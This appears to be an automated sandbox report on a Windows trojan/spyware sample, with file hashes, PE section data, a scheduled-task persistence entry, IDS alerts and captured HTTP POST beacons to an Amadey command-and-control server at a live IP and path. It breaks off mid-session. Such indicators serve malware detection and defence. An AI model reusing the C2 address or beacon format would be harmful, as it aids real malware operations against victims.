                  Original Sample Name:724f6f07b8d94b11184884da8fcf987cf43ce7020adf24240e213b65d2f93b4f.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@4/3@0/1
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target Jl5yg1Km2s.exe, PID 6896 because it is empty
                  • Execution Graph export aborted for target explorti.exe, PID 736 because there are no executed functions
                  • Not all processes were analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: Jl5yg1Km2s.exe
                  Time | Type | Description
                  15:08:10 | API Interceptor | 15331343x Sleep call for process: explorti.exe modified
                  20:08:05 | Task Scheduler | Run new task: explorti path: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                  77.91.77.82 | file.exe | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar | Browse | 77.91.77.82/Hun4Ko/index.php
                   | Nin6JE44ky.exe | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar | Browse | 77.91.77.82/Hun4Ko/index.php
                   | file.exe | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar | Browse | 77.91.77.82/Hun4Ko/index.php
                   | file.exe | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar, Xmrig | Browse | 77.91.77.82/Hun4Ko/index.php
                   | file.exe | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar, Xmrig | Browse | 77.91.77.82/Hun4Ko/index.php
                   | file.exe | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar | Browse | 77.91.77.82/Hun4Ko/index.php
                   | file.exe | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar | Browse | 77.91.77.82/Hun4Ko/index.php
                   | file.exe | Get hash | malicious | Amadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar | Browse | 77.91.77.82/Hun4Ko/index.php
                   | file.exe | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar | Browse | 77.91.77.82/Hun4Ko/index.php
                   | B2lQl9Iy3w.exe | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar | Browse | 77.91.77.82/Hun4Ko/index.php
                  No context
                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                  FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU | file.exe | Get hash | malicious | Vidar | Browse | 77.91.101.71
                   | IRqsWvBBMc.exe | Get hash | malicious | Amadey, Vidar | Browse | 77.91.101.71
                   | file.exe | Get hash | malicious | Vidar | Browse | 77.91.101.71
                   | Bootstrapper.exe | Get hash | malicious | Hancitor, Vidar | Browse | 77.91.101.71
                   | Setup .exe | Get hash | malicious | Go Injector, MicroClip, Vidar, Xmrig | Browse | 77.91.101.71
                   | file.exe | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar | Browse | 77.91.77.82
                   | Nin6JE44ky.exe | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar | Browse | 77.91.77.82
                   | file.exe | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar | Browse | 77.91.77.82
                   | file.exe | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar, Xmrig | Browse | 77.91.77.82
                   | file.exe | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar, Xmrig | Browse | 77.91.77.82
                  No context
                  No context
                  Process:C:\Users\user\Desktop\Jl5yg1Km2s.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):1924608
                  Entropy (8bit):7.946978466746217
                  Encrypted:false
                  SSDEEP:49152:Ol6fovB6nC9NktNC5wmqT+/JIObIKvKWRM6BSZ:Oltn9uC5wEIbKvHm+
                  MD5:1C198A27C76F075B7901945F67ED0115
                  SHA1:335479DD8185471A31C464EC4BF5A3B4C3430C67
                  SHA-256:724F6F07B8D94B11184884DA8FCF987CF43CE7020ADF24240E213B65D2F93B4F
                  SHA-512:E52B9A820A573CB21D8740B8518C58A6502554F380C32B57BB2AB54DDA07725D16036BF85C51ED997E33D359F35B295453E95D8E8BB28C78FFF2B2766C2BAA36
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 79%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af..............................L...........@..........................@L...........@.................................X...l...........................`.K...............................K..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...cqehubfu.P....1..F..................@...gcjpmbpo......L......8..............@....taggant.0....L.."...<..............@...........................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\Jl5yg1Km2s.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview:[ZoneTransfer]....ZoneId=0
                  Process:C:\Users\user\Desktop\Jl5yg1Km2s.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):288
                  Entropy (8bit):3.4411673677304013
                  Encrypted:false
                  SSDEEP:6:81X4RKUEZ+lX1QYShMl6lm6tPjgsW2YRZuy0l1XAut0:8x4RKQ13vg7jzvYRQV1wut0
                  MD5:26A105B7EE2EFD3003F2F457697620BC
                  SHA1:23782A94240EE775ED040F259732EB535A348E06
                  SHA-256:9ADABF1A78902C505B2C0A34D151A41EE8B6E676E41335220ECAB29670B3BEDC
                  SHA-512:3633E65BF230D95251A88BA1C4FBFA454C33C957C1C32FB98598B7933919A989B782DAD305AC4C310E2FF75F34D13B8F2E566BE3C2F4F36BD13C7B47BC23DE71
                  Malicious:false
                  Reputation:low
                  Preview:.....d{..I.V...m.EF.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.d.4.0.9.7.1.b.6.b.\.e.x.p.l.o.r.t.i...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.946978466746217
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:Jl5yg1Km2s.exe
                  File size:1'924'608 bytes
                  MD5:1c198a27c76f075b7901945f67ed0115
                  SHA1:335479dd8185471a31c464ec4bf5a3b4c3430c67
                  SHA256:724f6f07b8d94b11184884da8fcf987cf43ce7020adf24240e213b65d2f93b4f
                  SHA512:e52b9a820a573cb21d8740b8518c58a6502554f380c32b57bb2ab54dda07725d16036bf85c51ed997e33d359f35b295453e95d8e8bb28c78fff2b2766c2baa36
                  SSDEEP:49152:Ol6fovB6nC9NktNC5wmqT+/JIObIKvKWRM6BSZ:Oltn9uC5wEIbKvHm+
                  TLSH:919533B1A64393EDC95C2EBA765A0CB4F8C146BF015AE8BD0FFA9475D1783AC1B4C241
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                  Icon Hash:90cececece8e8eb0
                  Entrypoint:0x8c1000
                  Entrypoint Section:.taggant
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6661EA84 [Thu Jun 6 16:57:40 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:6
                  OS Version Minor:0
                  File Version Major:6
                  File Version Minor:0
                  Subsystem Version Major:6
                  Subsystem Version Minor:0
                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                  Instruction
                  jmp 00007F1CC8B65C8Ah
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a058 | 0x6c | .idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x1e0 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4bf460 | 0x10 | cqehubfu
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x4bf410 | 0x18 | cqehubfu
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  (unprintable name) | 0x1000 | 0x68000 | 0x2dc00 | ddf2132bfa95a4f056d0506e04bc4a7f | False | 0.9978921191939891 | data | 7.97975540171384 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc | 0x69000 | 0x1e0 | 0x200 | 90dcbe8e9568915d91c8541371ca965e | False | 0.580078125 | data | 4.497195900272457 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata  | 0x6a000 | 0x1000 | 0x200 | 6e66ae8f9a75bc604a087c954abf8737 | False | 0.15234375 | data | 1.0684380430289213 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  (unprintable name) | 0x6b000 | 0x2b0000 | 0x200 | 7886fa96f588048ecb3d4a815746961f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  cqehubfu | 0x31b000 | 0x1a5000 | 0x1a4600 | 394dbeaa7a43366bea5a7751255070cd | False | 0.9945843322554268 | data | 7.9529251999211485 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  gcjpmbpo | 0x4c0000 | 0x1000 | 0x400 | 440f52e96c9dcacf1079d1c82a9e783d | False | 0.7744140625 | data | 6.011612822650518 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .taggant | 0x4c1000 | 0x3000 | 0x2200 | 7d39624cc62b849850940934a013c364 | False | 0.006548713235294118 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                  RT_MANIFEST | 0x4bf470 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
                  DLL | Import
                  kernel32.dll | lstrcpy
                  Language of compilation system | Country where language is spoken
                  English | United States
                  Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                  2024-07-26T21:08:18.169836+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49732 | 52.165.165.26 | 192.168.2.4
                  2024-07-26T21:09:12.919252+0200 | TCP | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 49751 | 80 | 192.168.2.4 | 77.91.77.82
                  2024-07-26T21:08:15.512214+0200 | TCP | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 49730 | 80 | 192.168.2.4 | 77.91.77.82
                  2024-07-26T21:08:23.668370+0200 | TCP | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 49736 | 80 | 192.168.2.4 | 77.91.77.82
                  2024-07-26T21:08:31.809183+0200 | TCP | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 49740 | 80 | 192.168.2.4 | 77.91.77.82
                  2024-07-26T21:08:56.594028+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49747 | 52.165.165.26 | 192.168.2.4
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  • 77.91.77.82
                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  0           192.168.2.4  49730        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:08:11.492743015 CEST  151                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  1           192.168.2.4  49731        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:08:15.536706924 CEST  303                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  2           192.168.2.4  49736        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:08:19.658808947 CEST  151                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  3           192.168.2.4  49739        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:08:23.678807020 CEST  303                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  4           192.168.2.4  49740        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:08:27.802443027 CEST  151                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  5           192.168.2.4  49741        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:08:31.817023039 CEST  303                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  6           192.168.2.4  49742        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:08:35.943797112 CEST  151                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  7           192.168.2.4  49743        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:08:39.956861019 CEST  303                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  8           192.168.2.4  49744        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:08:44.068290949 CEST  151                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  9           192.168.2.4  49745        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:08:48.083638906 CEST  303                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  10          192.168.2.4  49746        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:08:52.206054926 CEST  151                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  11          192.168.2.4  49748        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:08:56.225498915 CEST  303                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  12          192.168.2.4  49749        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:09:00.526297092 CEST  151                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  13          192.168.2.4  49750        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:09:04.519944906 CEST  303                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  14          192.168.2.4  49751        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:09:08.909030914 CEST  151                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  15          192.168.2.4  49752        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:09:12.927653074 CEST  303                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  16          192.168.2.4  49753        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
